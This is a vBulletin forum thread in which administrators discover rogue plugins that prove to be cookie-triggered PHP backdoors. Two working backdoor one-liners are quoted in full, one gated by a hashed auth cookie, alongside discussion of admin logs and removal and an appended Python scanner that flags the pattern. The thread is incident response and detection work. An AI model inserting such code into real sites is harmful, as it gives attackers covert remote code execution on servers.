Is This a Default Plugin?


  • Is This a Default Plugin?

    vbCMS Global Thread Cache

    Code:
    /* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
    Wondering if this is related to the vbseo security update. I noticed this plugin after upgrading to 4.1.10 but Brian at vbseo says it looks suspicious.
    Nation of Blue - Kentucky Wildcats Sports


    Some CMS Goodness: Add Avatar to Article

  • #2
    I'm interested to know as well so it's something I can check on client sites.
    -- Web Developer for hire
    ---Online Marketing Tools and Articles

    Comment


    • #3
      Further discussion at vbseo says it is not a part of the default package and should be removed.
      Nation of Blue - Kentucky Wildcats Sports


      Some CMS Goodness: Add Avatar to Article

      Comment


      • #4
        Originally posted by reefland
        Further discussion at vbseo says it is not a part of the default package and should be removed.
        I saw that. I did some Google searching and the only info I found was it listed on Arabic sites.
        -- Web Developer for hire
        ---Online Marketing Tools and Articles

        Comment


        • #5
          It should be removed. One thing I've noticed lately is once someone gets into a site, via whatever means, they are more likely to install a backdoor. This looks to be such an occurrence.

          However, vbulletin_collapse is a valid cookie. Usually looks like this: vbulletin_collapse=c_cat134 c_cat115. Tells the system what areas you have collapsed. Since the collapsing is done by CSS and JavaScript, there is no real need to have this value in PHP or cached in PHP. Most likely they are creating fake cookies and executing code via the $m variable.

          And my previously published checks for compromises will not check for this plugin via Query. I'll update the protocols.
          Translations provided by Google.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API

          Comment


          • #6
            Thanks for confirming Wayne Luke
            -- Web Developer for hire
            ---Online Marketing Tools and Articles

            Comment


            • #7
              Time to watch the admin log...
              Nation of Blue - Kentucky Wildcats Sports


              Some CMS Goodness: Add Avatar to Article

              Comment


              • #8
                Is there any way we can see how this plugin was added?

                Comment


                • #9
                  Since it seems people have reported over on vBSEO that it's come back even after fixing that hole... if this isn't coming from vBSEO, then should we conclude at this stage that the exploit that's being used is something that's a bug in vBulletin itself?

                  Originally posted by reefland
                  Time to watch the admin log...
                  The plugin was added on my forums, however when I checked the admin log on plugin.php for the past month or so, I didn't see anything in there I didn't do myself. Not sure it's going to show.
                  Last edited by Archaic; Mon 23 Jan '12, 12:30pm.
                  神出鬼没 - shin shutsu ki botsu

                  Webmaster, Bulbagarden / Bulbapedia

                  Comment


                  • #10
                    Originally posted by Talaturen
                    Is there any way we can see how this plugin was added?
                    Plugins should be logged in the Admin Log. However if you give access to it all the time, they can be deleted.
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API

                    Comment


                    • #11
                      I found a plugin called "vBulletin Templates Cookie Caching":
                      PHP Code:
                      /* vBulletin Templates Cookie Caching */
                      $vbr="hnmeesht";$vbh="4a74242f98a955c5b99215f95e7c3f20";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 
                      Macht mit beim 2-Wheel-Planet Adventskalender:

                      2WP Adventskalender

                      Comment


                      • #12
                        Originally posted by Archaic
                        If this isn't coming from vBSEO, then should we conclude at this stage that the exploit that's being used is something that's a bug in vBulletin itself?
                        A conclusion like that would only be supported with proof of some sort. Looks like your vBulletin is up to date. Looks like you stayed up to date with patches. Your Admin CP isn't behind .htaccess though.

                        Are all your addons up to date?

                        Do you have anything stored in the searchprefs field of the usertextfield table?
                        Translations provided by Google.

                        Wayne Luke
                        The Rabid Badger - a vBulletin Cloud demonstration site.
                        vBulletin 5 API

                        Comment


                        • #13
                          I found something in the admin log:
                          54131 admin 20:04, 20.01.2012 plugin.php
                          54130 admin 20:04, 20.01.2012 plugin.php update
                          54129 admin 20:04, 20.01.2012 plugin.php add
                          54128 admin 20:04, 20.01.2012 plugin.php
                          The incredible thing is that I really was active in the admincp minutes later... 20:05 I did some template changes...
                          Macht mit beim 2-Wheel-Planet Adventskalender:

                          2WP Adventskalender

                          Comment


                          • #14
                            Originally posted by MK_1
                            I found a plugin called "vBulletin Templates Cookie Caching":
                            PHP Code:
                            /* vBulletin Templates Cookie Caching */
                            $vbr="hnmeesht";$vbh="4a74242f98a955c5b99215f95e7c3f20";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 

                            Same as the plugin above but different cookie values.
                            Translations provided by Google.

                            Wayne Luke
                            The Rabid Badger - a vBulletin Cloud demonstration site.
                            vBulletin 5 API

                            Comment
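
An added example, not written by any poster in this thread and not vBulletin's own tooling: a heuristic scanner for the pattern both plugins quoted above share, where a cookie is split by preg_match and a captured group is then called as a function name. The function names, finding labels and the benign sample are assumptions made for illustration; the two flagged samples are the plugin bodies quoted in the thread.

```python
import re

# Request-controlled PHP superglobals.
USER_INPUT = re.compile(r"\$_(?:COOKIE|GET|POST|REQUEST)\b")
# preg_match(..., $m): the last argument is the array that receives the captures.
CAPTURE_VAR = re.compile(r"preg_match(?:_all)?\s*\(.*?,\s*\$(\w+)\s*\)", re.S)
# $m[1](...): an array element used as a function name.
ELEMENT_CALL = re.compile(r"\$(\w+)\s*\[\s*\d+\s*\]\s*\(")
# md5($_COOKIE[...]): request data compared against a stored hash.
HASH_GATE = re.compile(r"\bmd5\s*\(\s*\$_(?:COOKIE|GET|POST|REQUEST)\b")

def scan_plugin(code):
    """Return sorted finding labels (this example's own labels) for PHP source."""
    findings = set()
    if USER_INPUT.search(code):
        findings.add("reads-request-data")
    captures = set(CAPTURE_VAR.findall(code))
    for var in ELEMENT_CALL.findall(code):
        findings.add("dynamic-call")
        if var in captures:
            findings.add("calls-regex-capture")
    if HASH_GATE.search(code):
        findings.add("hash-gated-input")
    return sorted(findings)

def is_backdoor_like(code):
    """True when request data can reach a call whose name is a regex capture."""
    found = scan_plugin(code)
    return "reads-request-data" in found and "calls-regex-capture" in found

# Plugin title -> PHP body. The first two bodies are quoted from the thread;
# the third is a constructed benign plugin that only reads the collapse cookie.
SAMPLES = {
    "vbCMS Global Thread Cache": r'''(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);''',
    "vBulletin Templates Cookie Caching": r'''$vbr="hnmeesht";$vbh="4a74242f98a955c5b99215f95e7c3f20";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);''',
    "Constructed benign example": r'''$collapsed = isset($_COOKIE["vbulletin_collapse"]) ? explode(" ", $_COOKIE["vbulletin_collapse"]) : array();''',
}

def flagged(plugins):
    """Titles of plugins worth a manual look, in input order."""
    return [title for title, code in plugins.items() if is_backdoor_like(code)]

if __name__ == "__main__":
    for title in flagged(SAMPLES):
        print(title, scan_plugin(SAMPLES[title]))
```

This is a heuristic for this family of cookie-driven dynamic calls only; a clean result on exported plugin code does not clear a site.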


                            • #15
                              This "vbCMS Global Thread Cache" has appeared on my site as well.

                              Should I conclude that my site has been hacked?? If so, what measures should I take to clean up the damage? Please advise.
                              Fantasy Writing Forum - Mythic Scribes

                              Comment
